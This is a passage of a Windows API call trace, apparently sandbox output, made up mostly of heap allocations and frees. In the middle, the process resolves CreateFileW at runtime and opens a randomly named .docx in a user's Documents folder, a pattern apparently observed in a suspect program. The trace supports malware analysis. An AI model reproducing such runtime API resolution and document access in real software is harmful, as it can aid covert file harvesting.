(HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0078.008] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0078.008] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0078.008] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24a0 [0078.008] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23a0 [0078.008] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0078.009] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0078.009] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0078.009] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0078.009] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0078.009] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfbf8 [0078.009] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24a0 [0078.009] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0078.009] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23d0 [0078.009] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23a0 [0078.009] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0078.009] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0078.009] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23d0 | out: hHeap=0x1780000) returned 1 [0078.009] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0078.009] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0078.009] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23a0 [0078.009] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0078.009] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23d0 [0078.009] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0078.009] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0078.009] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0078.009] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23d0 | out: hHeap=0x1780000) returned 1 [0078.009] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0078.009] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0078.009] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0078.009] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0078.009] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0078.010] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0078.010] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0078.010] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0078.010] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0078.010] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0078.010] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0078.010] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0078.010] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0078.010] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0078.010] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0078.010] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0078.010] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0078.010] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0078.010] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0078.010] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0078.010] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0078.010] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0078.010] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2560 [0078.010] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0078.010] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0078.010] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0078.010] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0078.010] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0078.010] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0078.010] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2560 [0078.011] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0078.011] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0078.011] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0078.011] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0078.011] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0078.011] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0078.011] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0078.011] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0078.011] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0078.011] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0078.011] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2600 [0078.011] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2550 [0078.011] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0078.011] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0078.011] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0078.011] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0078.011] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0078.011] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x772d0000 [0078.011] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0078.011] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2600 [0078.011] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0078.011] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca5c8 [0078.012] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x43ca5c8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0078.012] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0078.012] GetProcAddress (hModule=0x772d0000, lpProcName="CreateFileW") returned 0x7733ed10 [0078.012] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0078.012] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0078.012] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf978 [0078.012] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0078.012] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2700 [0078.012] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0078.012] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0078.012] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0078.012] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0078.012] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0078.012] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20002) returned 0x43eb3a8 [0078.012] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0078.012] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0078.012] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0078.012] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0078.012] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0078.012] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0078.012] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0078.012] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf978 | out: hHeap=0x1780000) returned 1 [0078.013] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\T- t3K 6dV0.docx" (normalized: "c:\\users\\fd1hvy\\documents\\t- t3k 6dv0.docx"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x298 [0078.013] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0078.013] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e9e90 [0078.013] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8d8 [0078.013] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0078.013] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0078.013] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0078.013] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0078.013] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0078.013] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0078.013] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0078.013] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0078.013] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0078.013] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0078.013] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2600 [0078.013] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0078.013] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x60) returned 0x43596c0 [0078.013] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43eb3a8 | out: hHeap=0x1780000) returned 1 [0078.013] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0078.013] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0078.013] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0078.013] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0078.014] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0078.014] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0078.014] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0078.014] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0078.014] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0078.014] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0078.014] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0078.014] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0078.014] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0078.014] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0078.014] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0078.014] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0078.014] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0078.014] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0078.014] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0078.014] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0078.014] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0078.014] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0078.014] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0078.014] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0078.014] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0078.014] FreeLibrary (hLibModule=0x772d0000) returned 1 [0078.014] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0078.014] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0078.015] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0078.015] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0078.015] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0078.015] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0078.015] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0078.015] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfbf8 | out: hHeap=0x1780000) returned 1 [0078.015] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0078.015] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0078.015] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3d0 | out: hHeap=0x1780000) returned 1 [0078.015] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca388 | out: hHeap=0x1780000) returned 1 [0078.015] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3e8 | out: hHeap=0x1780000) returned 1 [0078.015] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0078.015] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca460 | out: hHeap=0x1780000) returned 1 [0078.015] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0078.015] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0078.015] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca400 | out: hHeap=0x1780000) returned 1 [0078.015] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca268 | out: hHeap=0x1780000) returned 1 [0078.015] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca190 | out: hHeap=0x1780000) returned 1 [0078.015] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1d8 | out: hHeap=0x1780000) returned 1 [0078.015] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1c0 | out: hHeap=0x1780000) returned 1 [0078.015] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca340 | out: hHeap=0x1780000) returned 1 [0078.015] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca238 | out: hHeap=0x1780000) returned 1 [0078.015] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca310 | out: hHeap=0x1780000) returned 1 [0078.015] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1f0 | out: hHeap=0x1780000) returned 1 [0078.016] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2e0 | out: hHeap=0x1780000) returned 1 [0078.016] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca280 | out: hHeap=0x1780000) returned 1 [0078.016] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca358 | out: hHeap=0x1780000) returned 1 [0078.016] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0078.016] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca370 | out: hHeap=0x1780000) returned 1 [0078.016] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0078.016] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0078.016] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0078.016] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0078.016] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0078.016] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0078.016] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0078.016] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a5250 | out: hHeap=0x1780000) returned 1 [0078.016] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0078.016] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0078.016] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43eab80 | out: hHeap=0x1780000) returned 1 [0078.016] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0078.016] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0078.016] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0078.016] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0078.016] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23d0 | out: hHeap=0x1780000) returned 1 [0078.016] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0078.016] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0078.016] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfbf8 | out: hHeap=0x1780000) returned 1 [0078.016] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f08 | out: hHeap=0x1780000) returned 1 [0078.016] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0078.016] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0078.017] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0078.017] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0078.017] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23d0 | out: hHeap=0x1780000) returned 1 [0078.017] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8c30 | out: hHeap=0x1780000) returned 1 [0078.017] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e78 | out: hHeap=0x1780000) returned 1 [0078.017] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e00 | out: hHeap=0x1780000) returned 1 [0078.017] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2200 | out: hHeap=0x1780000) returned 1 [0078.017] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfab8 | out: hHeap=0x1780000) returned 1 [0078.017] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca478 | out: hHeap=0x1780000) returned 1 [0078.017] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb30 | out: hHeap=0x1780000) returned 1 [0078.017] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0078.017] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf950 | out: hHeap=0x1780000) returned 1 [0078.017] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c68 | out: hHeap=0x1780000) returned 1 [0078.017] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d88 | out: hHeap=0x1780000) returned 1 [0078.017] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf608 | out: hHeap=0x1780000) returned 1 [0078.017] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2270 | out: hHeap=0x1780000) returned 1 [0078.017] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf5e0 | out: hHeap=0x1780000) returned 1 [0078.017] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d40 | out: hHeap=0x1780000) returned 1 [0078.017] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d28 | out: hHeap=0x1780000) returned 1 [0078.017] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2240 | out: hHeap=0x1780000) returned 1 [0078.017] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd38 | out: hHeap=0x1780000) returned 1 [0078.017] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e18 | out: hHeap=0x1780000) returned 1 [0078.017] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391a10 | out: hHeap=0x1780000) returned 1 [0078.017] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0078.017] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa68 | out: hHeap=0x1780000) returned 1 [0078.017] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d70 | out: hHeap=0x1780000) returned 1 [0078.017] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa90 | out: hHeap=0x1780000) returned 1 [0078.018] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21e0 | out: hHeap=0x1780000) returned 1 [0078.018] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb08 | out: hHeap=0x1780000) returned 1 [0078.018] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2b0 | out: hHeap=0x1780000) returned 1 [0078.018] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb58 | out: hHeap=0x1780000) returned 1 [0078.018] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0078.018] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfae0 | out: hHeap=0x1780000) returned 1 [0078.018] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0078.018] HeapFree (in: 